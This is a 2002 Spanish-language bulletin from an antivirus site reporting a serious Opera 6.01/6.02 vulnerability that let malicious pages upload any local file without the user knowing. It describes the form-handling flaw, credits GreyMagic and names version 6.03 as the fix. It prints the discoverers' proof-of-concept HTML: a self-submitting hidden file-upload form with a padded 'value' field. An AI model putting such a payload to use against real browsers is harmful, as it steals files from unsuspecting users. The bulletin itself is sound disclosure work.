Video Soft BBS


Video Soft BBS
Menú Principal
Anti Trojans
Antivirus
Hoaxes
Subscripciones
Otro software
Artículos
Links
Sugerencias
Sobre el BBS
Direcciones
Galería
Chat

Controlado desde el 19/10/97 por NedStat

VSAntivirus   
Esta página es un servicio gratuito de Video Soft BBS -
SUBSCRIBASE en nuestras listas de correo.
Es usted nuestro visitante número  desde el 12 de agosto de 1996

Opera permite la descarga de archivos sin autorización
 
VSantivirus No. 690 - Año 6 - Martes 28 de mayo de 2002

Opera permite la descarga de archivos sin autorización
http://www.vsantivirus.com/vul-opera-file-read.htm

Aviso de seguridad: Lectura de cualquier archivo en Opera
Nombre original: Reading ANY local file in Opera. 
Fecha original: 7/may/02
Autor/descubridor: GreyMagic Software, Israel <security@greymagic.com>
Aplicación vulnerable: Opera 6.01 y 6.02 en plataformas Windows.
Severidad: Alta
Riesgo: Robo de información confidencial de cualquier origen
Fabricante: Opera.com (fue avisado el 15 de mayo y el 16 estaba resuelto el problema, en la versión 6.03 del programa).
Referencia: GreyMagic Security Advisory GM#001-OP

Una grave vulnerabilidad (tal vez la más importante hasta la fecha), ha sido descubierta en las versiones 6.01 y 6.02 del navegador Opera para Windows. La misma permite que desde un sitio Web malicioso se pueda descargar cualquier archivo de la computadora de la víctima.

Opera es utilizado por muchos usuarios, por ser pequeño y rápido, y por no sufrir de tantas fallas de seguridad como el Internet Explorer. Sin embargo, esto no significa que sea inmune a las brechas de seguridad, ya que no es esta la primera vulnerabilidad detectada en él, aunque los expertos coinciden que tal vez sí sea la más grave.

El problema se produce por el modo que Opera maneja el envío de formularios que involucra una transferencia de datos vía HTTP. Normalmente, se muestra una ventana de diálogo solicitando la confirmación o no, para comenzar el traslado de un archivo. Sin embargo, mediante la manipulación de ciertas etiquetas en el código de los formularios, se puede evitar la aparición de esta advertencia, haciendole creer al usuario que ninguna transferencia va a realizarse.

Una demostración proporcionada por los descubridores de la falla, implementa un código que transfiere un archivo ficticio "c:/test.txt" al host del atacante. Esto se produce sin ninguna acción intermedia del usuario. La ejecución del exploit es automática.

El ejemplo:

<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data"
action="recFile.php" name="secForm">
<input type="file" name="expFile"
value="c:\test.txt&#10;" style="visibility:hidden">
</form>
</body>

La vulnerabilidad se produce al agregarse unos caracteres al contenido del campo "value":

c:\test.txt&#10;

La solución pasa por descargar e instalar la versión más reciente (6.03 o superior), que ya ha resuelto la falla. Tampoco son afectadas las versiones 6.0 o anteriores.


Referencias:

Opera.com
http://www.opera.com/

GreyMagic Security Advisory GM#001-OP
http://sec.greymagic.com/adv/gm001-op/



(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com

 

Copyright 1996-2002 Video Soft BBS